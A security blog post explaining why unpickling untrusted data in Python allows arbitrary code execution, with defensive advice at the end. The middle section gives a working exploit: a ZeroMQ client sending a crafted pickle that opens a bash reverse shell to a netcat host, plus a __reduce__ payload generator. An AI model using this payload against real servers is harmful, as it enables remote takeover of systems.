Playing with Pickle Security

Reading about the latest vulnerabilities in Rails, got me thinking about a similar issue we have in Python.

It is well known that using pickle on untrusted data is insecure to the point of allowing arbitrary code execution. Or at least it should be.

If we head to the official documentation for pickle we’ll find this warning:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Now, how many of us check the official pickle documentation (or the official docs for any other module) every time we’re going to use it? Even if we’ve read that warning before, it’s easy to forget it and mistake pickle for any other serialization format (specially when solving a problem for which pickle is just a tool). We might even be using someone else’s code that unpickles insecure data.

Pickle as a vulnerability

As a sanity check, to see if I was being paranoid, I went over to GitHub and ran a search for “pickle.loads” which lead to 36,375 results. After that, it took about 10 minutes to find a vulnerable project and exploit the vulnerability (actual code used by companies, not just some learn_pickle_test.py). I also found many “potentially vulnerable” projects, but didn’t taking the time to try to demonstrate the issue on each of them.

Exploiting the vulnerability

The vulnerable code looks something like this:

import zmq

import cPickle as pickle

class Server(object):
    def __init__(self):
        context = zmq.Context()

        self.receiver = context.socket(zmq.PULL)
        self.receiver.bind("tcp://*:1234")

        self.sender = context.socket(zmq.PUSH)
        self.sender.bind("tcp://*:1235")

    def send(self, data):
        self.sender.send(pickle.dumps(data))

    def recv(self):
        data = self.receiver.recv()
        return pickle.loads(data)

and at some point makes the server listen by doing:

server = Server()
server.recv()

Exploiting this is as easy as opening netcat with nc -l -p 9000 on an accessible server and running:

import sys
import zmq

def main():
    server_host = '98.76.54.32'
    netcat_host = '12.34.56.78'

    context = zmq.Context()
    zmq_socket = context.socket(zmq.PUSH)
    zmq_socket.connect('tcp://%s:1234' % server_host)

    shellcode = "cposix\nsystem\np0\n(S'/bin/bash -i >& /dev/tcp/%s/9000 0>&1'\np1\ntp2\nRp3\n." % netcat_host
    zmq_socket.send(shellcode)
    # we get a reverse shell on the netcat host

if __name__ == "__main__":
    main()

This will give the attacker a shell as the user running the vulnerable code, which would give an attacker a great deal of control over the server and the possibility of escalating privileges (if the user is not already root!) This is a very simple exploit, and it will leave a trace of us being there (though we could eliminate it once we have shell access), but it is incredibly fast and easy to write. It’s possible to write much more sophisticated exploits with a bit of knowledge of the internals of pickle. The shellcode we’re using in the example, or any other shellcode, can be obtained by a code like this:

import os
import cPickle

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('ls',))

shellcode = cPickle.dumps(Exploit())
print shellcode

This is because pickle is a very simple stack language that allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method.

Protecting ourselves

Only unpickle stuff you pickled yourself

This is harder than it sounds. Initially we could trust things that come from our own server (i.e.: if it’s in the DB, redis, the cache, etc, then I can trust it), but if someone has access to manipulate them, then they can also exploit this vulnerability. An example would be getting the server above to only accept conections from localhost, but run it on shared hosting.

Just avoid pickle

The easiest way of protecting ourselves is to not use pickle unless it’s actually necessary, and to check our dependencies to see if they are vulnerable to these (and other) atacks. If all we need is a serialization format for data, JSON is probably enough.

Don’t trust anyone

This is just another case of atackers using unvalidated data to break into our system. As with any user submited data, we need to somehow make sure that it is not being spoofed and/or that our code can handle malicious data graciously (also, harder than it sounds).

Better interfaces

The best way to avoid seeing any vulnerability in the wild is to educate ourselves to know when a piece of code is vulnerable. As API developers, a way of doing this is making sure that unsafe actions raise the necessary warnings or are self-documenting. In the case of pickle I’d like to see:

>>> with insecure_deserialization:
...     pickle.loads(x)
{}

# or

>>> pickle.loads(s)
SecurityWarning: Never unpickle data received from an untrusted or unauthenticated source.
{} 

# or 

>>> pickle.load_trusted_string(s)
{}